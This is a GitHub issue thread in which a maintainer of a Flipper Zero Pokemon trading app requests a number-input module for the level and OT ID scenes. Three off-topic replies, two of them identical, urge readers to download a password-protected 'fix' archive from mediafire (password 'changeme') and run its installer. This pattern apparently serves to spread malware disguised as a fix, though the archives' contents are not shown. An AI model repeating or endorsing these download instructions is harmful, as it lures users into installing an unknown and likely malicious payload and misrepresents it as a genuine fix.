kbembedded/Flipper-Zero-Game-Boy-Pokemon-Trading #41: Implement number input module for level and OT ID scenes

kbembedded, 2024-08-26:
### Describe the process.

Recently, flipper firmware implemented an input module that is just for number input rather than hex or a full keyboard (which is used now), implementing this would be a nice to have.

ritiiq, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

uno-zero, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

masooddahmedd, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."